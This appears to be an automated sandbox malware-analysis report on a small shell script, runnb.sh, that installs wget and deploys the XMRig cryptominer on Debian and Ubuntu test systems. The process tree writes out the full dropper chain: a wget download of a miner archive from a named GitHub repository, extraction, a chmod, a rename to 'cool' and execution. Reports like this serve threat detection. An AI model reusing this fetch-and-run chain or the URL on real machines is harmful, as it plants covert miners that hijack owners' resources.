Analysis
max time kernel: 217s
max time network: 1792s
platform: debian-12_mipsel
resource: debian12-mipsel-20240221-en
resource tags: arch:mipsel image:debian12-mipsel-20240221-en kernel:6.1.0-17-4kc-malta locale:en-us os:debian-12-mipsel system
submitted: 30-10-2024 07:12
Static task: static1
Behavioral tasks (sample runnb.sh in every task):
behavioral1: debian12-armhf-20240221-en
behavioral2: debian12-mipsel-20240221-en
behavioral3: debian9-armhf-20240611-en
behavioral4: debian9-mipsbe-20240611-en
behavioral5: debian9-mipsel-20240611-en
behavioral6: ubuntu2004-amd64-20240611-en
behavioral7: ubuntu2204-amd64-20240611-en
behavioral8: ubuntu2404-amd64-20240523-en
General
Target: runnb.sh
Size: 213B
MD5: a1189543e2f98f6696c6d857b899ab0a
SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures

XMRig Miner payload (2 IoCs)
Processes:
  resource                          yara_rule
  behavioral2/files/fstream-40.dat  family_xmrig
  behavioral2/files/fstream-40.dat  xmrig

Xmrig family

Xmrig_linux family

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.

File and Directory Permissions Modification (1 TTPs, 1 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes:
  pid   Process
  1140  chmod

Executes dropped EXE (1 IoCs)
Processes:
  ioc                     pid   Process
  /tmp/xmrig-6.22.0/cool  1142  cool

OS Credential Dumping (1 TTPs, 2 IoCs)
Adversaries may attempt to dump credentials to use them in password cracking.
Processes:
  description              ioc          Process
  File opened for reading  /etc/shadow  sudo
  File opened for reading  /etc/shadow  dpkg-preconfigure

Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 1 IoCs)
Abuse sudo or cached sudo credentials to execute code.

Deletes log files
Processes:
  description   ioc                        Process
  File deleted  /var/log/apt/eipp.log.xz   apt

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)

Write file to user bin folder (1 IoCs)
Processes:
  description                   ioc                     Process
  File opened for modification  /usr/bin/wget.dpkg-new  dpkg

Reads CPU attributes (1 TTPs, 1 IoCs)
Processes:
  description              ioc                             Process
  File opened for reading  /sys/devices/system/cpu/online  exim4

Reads runtime system information
Processes:
  description              ioc                                     Process
  File opened for reading  /proc/self/fd                           apt
  File opened for reading  /proc/self/fd                           apt
  File opened for reading  /proc/filesystems                       sudo
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/sys/kernel/ngroups_max            sendmail
  File opened for reading  /proc/meminfo                           dpkg-deb
  File opened for reading  /proc/filesystems                       tar
  File opened for reading  /proc/sys/kernel/seccomp/actions_avail  sudo
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/sys/crypto/fips_enabled           http
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/sys/kernel/ngroups_max            sudo
  File opened for reading  /proc/1/limits                          sudo
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/sys/crypto/fips_enabled           apt
  File opened for reading  /proc/sys/kernel/cap_last_cap           sudo
  File opened for reading  /proc/self/stat                         sudo
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/filesystems                       tar
  File opened for reading  /proc/filesystems                       mv
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/meminfo                           dpkg-deb
  File opened for reading  /proc/sys/kernel/ngroups_max            apt
  File opened for reading  /proc/filesystems                       dpkg
  File opened for reading  /proc/filesystems                       dpkg

System Network Configuration Discovery (1 TTPs, 2 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes:
  pid   Process
  1018  dpkg-split
  1018  dpkg-split

Writes file to tmp directory (4 IoCs)
Malware often drops required files in the /tmp directory.
Processes:
  description                   ioc                            Process
  File opened for modification  /tmp/xmrig-6.22.0/xmrig        tar
  File opened for modification  /tmp/xmrigtar.tar.gz           wget
  File opened for modification  /tmp/xmrig-6.22.0/SHA256SUMS   tar
  File opened for modification  /tmp/xmrig-6.22.0/config.json  tar
Processes
(indentation shows process depth; each line gives the executable, its command line, its PID and, in brackets, the signatures it triggered)

/tmp/runnb.sh  (cmd: /tmp/runnb.sh)  PID:737
  /usr/bin/sudo  (cmd: sudo apt install wget)  PID:739  [OS Credential Dumping; Abuse Elevation Control Mechanism: Sudo and Sudo Caching; Reads runtime system information]
    /usr/sbin/sendmail  (cmd: sendmail -t)  PID:754  [Reads runtime system information]
      /usr/sbin/exim4  (cmd: /usr/sbin/exim4 -Mc 1t637r-0000CA-1Y)  PID:775  [Reads CPU attributes]
    /usr/bin/apt  (cmd: apt install wget)  PID:761  [Deletes log files; Reads runtime system information]
      /usr/bin/dpkg  (cmd: /usr/bin/dpkg --print-foreign-architectures)  PID:773  [Reads runtime system information]
      /usr/bin/dpkg  (cmd: /usr/bin/dpkg --print-foreign-architectures)  PID:789  [Reads runtime system information]
      /usr/lib/apt/methods/http  (cmd: /usr/lib/apt/methods/http)  PID:896
      /usr/lib/apt/methods/http  (cmd: /usr/lib/apt/methods/http)  PID:897  [Reads runtime system information]
      /bin/sh  (cmd: /bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true")  PID:998
        /usr/sbin/dpkg-preconfigure  (cmd: /usr/sbin/dpkg-preconfigure --apt)  PID:999  [OS Credential Dumping]
          /usr/local/sbin/locale  (cmd: locale charmap)  PID:1002
          /usr/local/bin/locale  (cmd: locale charmap)  PID:1002
          /usr/sbin/locale  (cmd: locale charmap)  PID:1002
          /usr/bin/locale  (cmd: locale charmap)  PID:1002
          /bin/sh  (cmd: sh -c "stty -a 2>/dev/null")  PID:1003
            /usr/bin/stty  (cmd: stty -a)  PID:1004
          /bin/sh  (cmd: sh -c "stty -a 2>/dev/null")  PID:1005
            /usr/bin/stty  (cmd: stty -a)  PID:1006
          /bin/sh  (cmd: sh -c "stty -a 2>/dev/null")  PID:1007
            /usr/bin/stty  (cmd: stty -a)  PID:1008
          /bin/sh  (cmd: sh -c "stty -a 2>/dev/null")  PID:1009
            /usr/bin/stty  (cmd: stty -a)  PID:1010
          /bin/sh  (cmd: sh -c "stty -a 2>/dev/null")  PID:1011
            /usr/bin/stty  (cmd: stty -a)  PID:1012
          /bin/sh  (cmd: sh -c "stty -a 2>/dev/null")  PID:1013
            /usr/bin/stty  (cmd: stty -a)  PID:1014
      /usr/bin/dpkg  (cmd: /usr/bin/dpkg --assert-multi-arch)  PID:1015  [Reads runtime system information]
      /usr/bin/dpkg  (cmd: /usr/bin/dpkg --assert-protected-field)  PID:1016  [Reads runtime system information]
      /usr/bin/dpkg  (cmd: /usr/bin/dpkg --status-fd 17 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb)  PID:1017  [Write file to user bin folder; Reads runtime system information]
        /usr/sbin/dpkg-split  (cmd: dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb)  PID:1018  [System Network Configuration Discovery]
        /usr/bin/dpkg-split  (cmd: dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb)  PID:1018  [System Network Configuration Discovery; Software Deployment Tools]
        /usr/sbin/dpkg-deb  (cmd: dpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb /var/lib/dpkg/tmp.ci)  PID:1019
        /usr/bin/dpkg-deb  (cmd: dpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb /var/lib/dpkg/tmp.ci)  PID:1019  [Reads runtime system information]
          /usr/sbin/tar  (cmd: tar -x -f - "--warning=no-timestamp")  PID:1022
          /usr/bin/tar  (cmd: tar -x -f - "--warning=no-timestamp")  PID:1022  [Reads runtime system information]
        /usr/sbin/dpkg-deb  (cmd: dpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb)  PID:1024
        /usr/bin/dpkg-deb  (cmd: dpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_mipsel.deb)  PID:1024  [Reads runtime system information]
        /usr/sbin/rm  (cmd: rm -rf -- /var/lib/dpkg/tmp.ci)  PID:1028
        /usr/bin/rm  (cmd: rm -rf -- /var/lib/dpkg/tmp.ci)  PID:1028
      /usr/bin/dpkg  (cmd: /usr/bin/dpkg --status-fd 17 --configure --pending)  PID:1029  [Reads runtime system information; Software Deployment Tools]
      /usr/bin/dpkg  (cmd: /usr/bin/dpkg --print-foreign-architectures)  PID:1030  [Reads runtime system information]
      /usr/bin/dpkg  (cmd: /usr/bin/dpkg --print-foreign-architectures)  PID:1031  [Reads runtime system information]
      /usr/bin/dpkg  (cmd: /usr/bin/dpkg --print-foreign-architectures)  PID:1032  [Reads runtime system information]
  /usr/bin/apt  (cmd: apt install wget)  PID:1033  [Reads runtime system information]
    /usr/bin/dpkg  (cmd: /usr/bin/dpkg --print-foreign-architectures)  PID:1034  [Reads runtime system information]
    /usr/bin/dpkg  (cmd: /usr/bin/dpkg --print-foreign-architectures)  PID:1035  [Reads runtime system information]
  /usr/bin/wget  (cmd: wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz)  PID:1137  [Writes file to tmp directory]
  /usr/bin/tar  (cmd: tar xvf xmrigtar.tar.gz)  PID:1138  [Reads runtime system information; Writes file to tmp directory]
    /usr/local/sbin/gzip  (cmd: gzip -d)  PID:1139
    /usr/local/bin/gzip  (cmd: gzip -d)  PID:1139
    /usr/sbin/gzip  (cmd: gzip -d)  PID:1139
    /usr/bin/gzip  (cmd: gzip -d)  PID:1139
  /usr/bin/chmod  (cmd: chmod +x xmrig)  PID:1140  [File and Directory Permissions Modification]
  /usr/bin/mv  (cmd: mv xmrig cool)  PID:1141  [Reads runtime system information]
  /tmp/xmrig-6.22.0/cool  (cmd: ./cool)  PID:1142  [Executes dropped EXE]
Network
MITRE ATT&CK Enterprise v15
Downloads